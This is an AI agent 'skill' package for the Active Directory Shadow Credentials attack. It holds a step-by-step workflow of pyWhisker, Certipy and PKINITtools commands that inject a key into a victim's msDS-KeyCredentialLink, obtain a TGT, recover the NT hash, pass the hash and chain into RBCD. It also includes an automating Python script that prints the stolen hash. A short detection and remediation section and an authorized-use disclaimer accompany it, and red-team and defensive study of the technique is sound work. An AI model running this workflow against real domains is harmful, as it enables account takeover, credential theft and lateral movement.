npx skills add mukul975/Anthropic-Cybersecurity-SkillsLegal Notice: This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.
Overview
The Shadow Credentials technique abuses the msDS-KeyCredentialLink attribute of Active Directory user and computer objects. This attribute stores raw public keys ("Key Credentials") used by Windows Hello for Business and Azure AD device registration for passwordless certificate-based logon via PKINIT (Public Key Cryptography for Initial Authentication in Kerberos). If an attacker has write permission over a target object's msDS-KeyCredentialLink — typically granted by GenericWrite, GenericAll, WriteProperty, or AddKeyCredentialLink ACEs surfaced in BloodHound — they can append their own attacker-generated public key. They then request a TGT for the target via PKINIT using the matching private key and recover the target's NT hash, achieving complete account takeover without resetting the password, which is far stealthier than a forced password reset.
The technique was published by Elad Shamir ("Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover") and implemented in the C# tool Whisker. The Python equivalent pyWhisker (ShutdownRepo) manipulates the attribute over LDAP, and Certipy integrates the entire chain via certipy shadow auto. The target environment must support PKINIT and have at least one Domain Controller running Windows Server 2016 or later. Sources: pyWhisker, Whisker, The Hacker Recipes — Shadow Credentials.
When to Use
- When BloodHound reveals
GenericWrite/GenericAll/AddKeyCredentialLinkover a higher-value user or computer - As a stealthier alternative to
ForceChangePassword(no password reset = less disruption/alerting) - To take over a computer account to chain into Resource-Based Constrained Delegation (RBCD)
- During red-team operations needing account takeover without locking out the legitimate user
- For purple-team exercises generating
msDS-KeyCredentialLinkmodification telemetry
Prerequisites
- Authorized engagement scope including AD credential-access techniques
- Control of a principal with write access to the target's
msDS-KeyCredentialLink - A DC running Windows Server 2016+ with PKINIT enabled (domain functional level supporting Key Trust)
- Network reachability to LDAP (389/636) and Kerberos (88) on a DC
- Linux attack host with Python 3.8+; install the tooling:
# pyWhisker (from source) git clone https://github.com/ShutdownRepo/pywhisker cd pywhisker && pip install . # Certipy (integrated shadow attack) pipx install certipy-ad # PKINITtools for manual TGT/NT-hash extraction git clone https://github.com/dirkjanm/PKINITtools
Objectives
- Confirm write access over a target's
msDS-KeyCredentialLink - Generate a key pair and append a Key Credential to the target object
- Request a TGT for the target via PKINIT using the new key
- Recover the target's NT hash for pass-the-hash / further movement
- Clean up the injected Key Credential to restore the object's state
- Document the ACL path that enabled the attack for remediation
MITRE ATT&CK Mapping
| ID | Technique | Application in this skill |
|---|---|---|
| T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential (device key) to msDS-KeyCredentialLink to register an alternate authentication credential for the target account |
Workflow
Step 1: Confirm the write primitive
List existing Key Credentials on the target to verify you have the required access. An empty or readable result confirms write access for the add step.
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "list"Step 2: Add a Shadow Credential with pyWhisker
Generate a certificate/key pair and write it into the target's msDS-KeyCredentialLink. pyWhisker outputs a PFX you control.
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "add" --filename victim_shadow
# Produces victim_shadow.pfx and prints the PFX passwordUse Kerberos auth instead of a password if you only hold a ticket:
python3 pywhisker.py -d "corp.local" -u "attacker" -k --no-pass \
--target "victim" --action "add" --filename victim_shadow --use-ldapsStep 3: Request a TGT via PKINIT
Use the generated PFX with PKINITtools to obtain a Kerberos TGT for the target.
python3 PKINITtools/gettgtpkinit.py \
-cert-pfx victim_shadow.pfx -pfx-pass <PFX_PASSWORD> \
corp.local/victim victim.ccacheStep 4: Recover the NT hash
Extract the target's NT hash from the AS-REP using the session key from Step 3 (getnthash.py reads the AS-REP encryption key, displayed by gettgtpkinit.py).
export KRB5CCNAME=victim.ccache
python3 PKINITtools/getnthash.py -key <AS-REP-KEY-FROM-STEP-3> corp.local/victim
# Prints the NT hash for 'victim'Step 5: One-shot alternative with Certipy
Certipy's shadow auto performs add → PKINIT → dump hash → cleanup automatically, which is ideal for computer-account takeover.
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'
# For a computer account, use the sAMAccountName with trailing $
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'WS01$'Step 6: Use the recovered credential
Authenticate with the NT hash (or the TGT) to continue the engagement.
# Pass-the-hash with NetExec
nxc smb 10.0.0.10 -u victim -H <RECOVERED-NT-HASH>
# Or use the TGT directly
export KRB5CCNAME=victim.ccache
nxc smb dc.corp.local -u victim --use-kcacheStep 7: Chain computer takeover into RBCD (optional)
When the target is a computer, the recovered key/hash lets you configure Resource-Based Constrained Delegation to impersonate any user to that host.
# Set RBCD so attacker-controlled SPN can impersonate to WS01$
impacket-rbcd -delegate-from 'attacker$' -delegate-to 'WS01$' \
-action write 'corp.local/attacker:Passw0rd!'Step 8: Clean up
Remove the injected Key Credential to restore the object and reduce detection footprint.
# pyWhisker: remove by device-id (printed during add) or clear all you added
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "remove" --device-id <DEVICE-ID>
# Certipy shadow auto cleans up automatically; otherwise:
certipy shadow clear -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'Tools and Resources
| Resource | Purpose | Link |
|---|---|---|
| pyWhisker | Python LDAP manipulation of msDS-KeyCredentialLink | https://github.com/ShutdownRepo/pywhisker |
| Whisker | Original C# implementation | https://github.com/eladshamir/Whisker |
| Certipy | shadow auto end-to-end takeover |
https://github.com/ly4k/Certipy |
| PKINITtools | gettgtpkinit / getnthash | https://github.com/dirkjanm/PKINITtools |
| The Hacker Recipes | Technique walkthrough & defenses | https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials |
Detection and Remediation Notes
| Area | Guidance |
|---|---|
| Detection | Monitor Windows Security Event ID 5136 (directory object modified) for changes to msDS-KeyCredentialLink; alert when a non-AD-Connect/non-Intune principal writes the attribute. |
| Auditing | Enable directory service object change auditing on user/computer OUs. |
| Least privilege | Remove unnecessary GenericWrite/GenericAll/AddKeyCredentialLink ACEs (BloodHound AddKeyCredentialLink edge). |
| Mitigation | Where Windows Hello/device registration is unused, restrict who can write Key Credentials and consider tier-0 protected accounts. |
Validation Criteria
- Write access over the target's
msDS-KeyCredentialLinkconfirmed (listsucceeded) - Key Credential successfully added (PFX generated)
- PKINIT TGT obtained for the target account
- Target NT hash recovered and validated against a service
- (If computer) RBCD chain or onward movement demonstrated
- Injected Key Credential removed / object restored
- Enabling ACL path documented with remediation recommendation
References and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 2
api-reference.md2.5 KB
Shadow Credentials Tooling Reference
pyWhisker (https://github.com/ShutdownRepo/pywhisker)
Invocation: python3 pywhisker.py [auth] --target <obj> --action <action> [opts]
| Flag | Meaning |
|---|---|
-d DOMAIN |
Target domain (FQDN) |
-u USER |
Controlled username |
-p PASSWORD |
Password |
-k / --no-pass |
Kerberos auth (uses KRB5CCNAME) |
-H LM:NT |
Pass-the-hash |
--target NAME |
Target user/computer whose attribute is modified |
--action list |
Enumerate existing Key Credentials |
--action add |
Generate key pair, write Key Credential |
--action remove |
Remove one Key Credential by --device-id |
--action clear |
Remove all Key Credentials |
--action info |
Show details of a Key Credential |
--filename NAME |
Output PFX/PEM base name |
| `--export PEM | PFX` |
--device-id GUID |
Target device for remove/info |
--dc-ip IP |
Domain Controller IP |
--use-ldaps |
Use LDAPS (636) |
Example
python3 pywhisker.py -d corp.local -u attacker -p 'Passw0rd!' \
--target victim --action add --filename victim_shadowCertipy shadow (https://github.com/ly4k/Certipy)
| Command | Meaning |
|---|---|
certipy shadow auto |
Add → PKINIT → dump NT hash → cleanup (end to end) |
certipy shadow add |
Add Key Credential only |
certipy shadow list |
List Key Credentials |
certipy shadow clear |
Clear Key Credentials |
certipy shadow info |
Show Key Credential info |
Key flags: -u USER@DOMAIN, -p PW / -hashes :NT / -k -no-pass,
-dc-ip IP, -account TARGET (use trailing $ for computers), -ns IP, -dns-tcp.
Example
certipy shadow auto -u attacker@corp.local -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'WS01$'PKINITtools (https://github.com/dirkjanm/PKINITtools)
| Script | Purpose |
|---|---|
gettgtpkinit.py -cert-pfx FILE -pfx-pass PW DOMAIN/USER out.ccache |
Request TGT via PKINIT; prints AS-REP key |
getnthash.py -key <AS-REP-KEY> DOMAIN/USER |
Recover NT hash (KRB5CCNAME set) |
Example
python3 gettgtpkinit.py -cert-pfx victim_shadow.pfx -pfx-pass abc123 \
corp.local/victim victim.ccache
export KRB5CCNAME=victim.ccache
python3 getnthash.py -key <AS-REP-KEY> corp.local/victimDetection signal
- Event ID 5136 — modification of
msDS-KeyCredentialLink(Directory Service Changes auditing). - BloodHound edge:
AddKeyCredentialLink.
standards.md1.2 KB
Standards Mapping — Abusing Shadow Credentials for Privilege Escalation
MITRE ATT&CK (Enterprise)
| ID | Name | Rationale |
|---|---|---|
| T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential to msDS-KeyCredentialLink registers an alternate device/certificate credential for the target, which is exactly the device-registration manipulation this sub-technique describes. |
Reference: https://attack.mitre.org/techniques/T1098/005/
Related techniques exercised in the chain:
- T1649 (Steal or Forge Authentication Certificates) — the PKINIT certificate used to authenticate.
- T1550.003 / T1558 — using the recovered TGT/hash for movement.
NIST Cybersecurity Framework 2.0
| ID | Name | Rationale |
|---|---|---|
| PR.AA-05 | Access permissions, entitlements, and authorizations are defined, managed, and enforced incorporating least privilege and separation of duties | The attack is only possible because of over-permissive ACEs (GenericWrite/GenericAll/AddKeyCredentialLink) on AD objects; remediation is least-privilege enforcement of who may write Key Credentials. |
Reference: https://csrc.nist.gov/projects/cybersecurity-framework
Scripts 1
agent.py5.3 KB
#!/usr/bin/env python3
"""
shadowcred_takeover.py — Orchestrate a Shadow Credentials account takeover.
Wraps the real `certipy shadow auto` workflow (and optionally pyWhisker +
PKINITtools) to add a Key Credential to a target's msDS-KeyCredentialLink,
recover the NT hash via PKINIT, and clean up. Parses the tool output to surface
the recovered NT hash and TGT path.
Authorized use only. Requires write access over the target's
msDS-KeyCredentialLink and a DC running Windows Server 2016+ with PKINIT.
Install:
pipx install certipy-ad
git clone https://github.com/ShutdownRepo/pywhisker
git clone https://github.com/dirkjanm/PKINITtools
Examples:
python shadowcred_takeover.py certipy -u attacker@corp.local -p 'Passw0rd!' \
--dc-ip 10.0.0.100 --target 'WS01$'
python shadowcred_takeover.py pywhisker -d corp.local -u attacker \
-p 'Passw0rd!' --dc-ip 10.0.0.100 --target victim \
--pywhisker ./pywhisker/pywhisker.py
"""
import argparse
import os
import re
import shutil
import subprocess
import sys
def _which_or_die(binary, hint):
if shutil.which(binary) is None and not os.path.exists(binary):
sys.exit(f"[!] '{binary}' not found. {hint}")
def run(cmd, timeout=600):
print("[*] Running:", " ".join(cmd))
try:
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
sys.exit(f"[!] Command timed out after {timeout}s.")
out = proc.stdout + proc.stderr
print(out)
return proc.returncode, out
def parse_nthash(text):
"""Certipy prints 'Got hash for ...: aad3b...:<NT>'. Extract the NT half."""
m = re.search(r"[Gg]ot hash for .*?:\s*([0-9a-fA-F]{32}):([0-9a-fA-F]{32})", text)
if m:
return m.group(2)
m = re.search(r"\b[0-9a-fA-F]{32}:([0-9a-fA-F]{32})\b", text)
return m.group(1) if m else None
def certipy_flow(args):
_which_or_die("certipy", "Install with: pipx install certipy-ad")
cmd = ["certipy", "shadow", "auto",
"-u", args.user, "-dc-ip", args.dc_ip, "-account", args.target]
if args.password:
cmd += ["-p", args.password]
elif args.hashes:
cmd += ["-hashes", args.hashes]
elif args.kerberos:
cmd += ["-k", "-no-pass"]
else:
sys.exit("[!] Provide -p, --hashes, or -k.")
if args.ns:
cmd += ["-ns", args.ns, "-dns-tcp"]
rc, out = run(cmd)
if rc != 0:
sys.exit("[!] certipy shadow auto failed.")
nt = parse_nthash(out)
if nt:
print(f"\n[+] Recovered NT hash for {args.target}: {nt}")
print(f"[+] Reuse it: nxc smb {args.dc_ip} -u {args.target.rstrip('$')} -H {nt}")
else:
print("[!] Could not auto-extract NT hash; review output above.")
def pywhisker_flow(args):
if not args.pywhisker or not os.path.exists(args.pywhisker):
sys.exit("[!] --pywhisker must point to pywhisker.py")
base = "shadow_" + args.target.rstrip("$")
cmd = ["python3", args.pywhisker, "-d", args.domain, "-u", args.user,
"--target", args.target, "--action", "add", "--filename", base]
if args.password:
cmd += ["-p", args.password]
elif args.kerberos:
cmd += ["-k", "--no-pass"]
else:
sys.exit("[!] Provide -p or -k.")
if args.dc_ip:
cmd += ["--dc-ip", args.dc_ip]
rc, out = run(cmd)
if rc != 0:
sys.exit("[!] pyWhisker add failed.")
pfx_pass = None
m = re.search(r"[Pp]assword(?: for the PFX)?:\s*(\S+)", out)
if m:
pfx_pass = m.group(1)
print(f"\n[+] Key Credential added. PFX: {base}.pfx PFX-pass: {pfx_pass}")
print("[+] Next, request a TGT with PKINITtools:")
print(f" python3 gettgtpkinit.py -cert-pfx {base}.pfx -pfx-pass {pfx_pass} "
f"{args.domain}/{args.target.rstrip('$')} {base}.ccache")
print(" export KRB5CCNAME=%s.ccache" % base)
print(f" python3 getnthash.py -key <AS-REP-KEY> {args.domain}/{args.target.rstrip('$')}")
print("[!] Remember to clean up the injected Key Credential when done:")
print(f" python3 {args.pywhisker} -d {args.domain} -u {args.user} "
f"--target {args.target} --action clear")
def main():
ap = argparse.ArgumentParser(description="Shadow Credentials takeover orchestrator.")
sub = ap.add_subparsers(dest="mode", required=True)
c = sub.add_parser("certipy", help="Use certipy shadow auto (end to end)")
c.add_argument("-u", "--user", required=True, help="attacker@domain")
c.add_argument("-p", "--password")
c.add_argument("--hashes")
c.add_argument("-k", "--kerberos", action="store_true")
c.add_argument("--dc-ip", required=True, dest="dc_ip")
c.add_argument("--target", required=True, help="victim or WS01$")
c.add_argument("--ns")
w = sub.add_parser("pywhisker", help="Use pyWhisker add (manual PKINIT after)")
w.add_argument("-d", "--domain", required=True)
w.add_argument("-u", "--user", required=True)
w.add_argument("-p", "--password")
w.add_argument("-k", "--kerberos", action="store_true")
w.add_argument("--dc-ip", dest="dc_ip")
w.add_argument("--target", required=True)
w.add_argument("--pywhisker", required=True, help="Path to pywhisker.py")
args = ap.parse_args()
if args.mode == "certipy":
certipy_flow(args)
else:
pywhisker_flow(args)
if __name__ == "__main__":
main()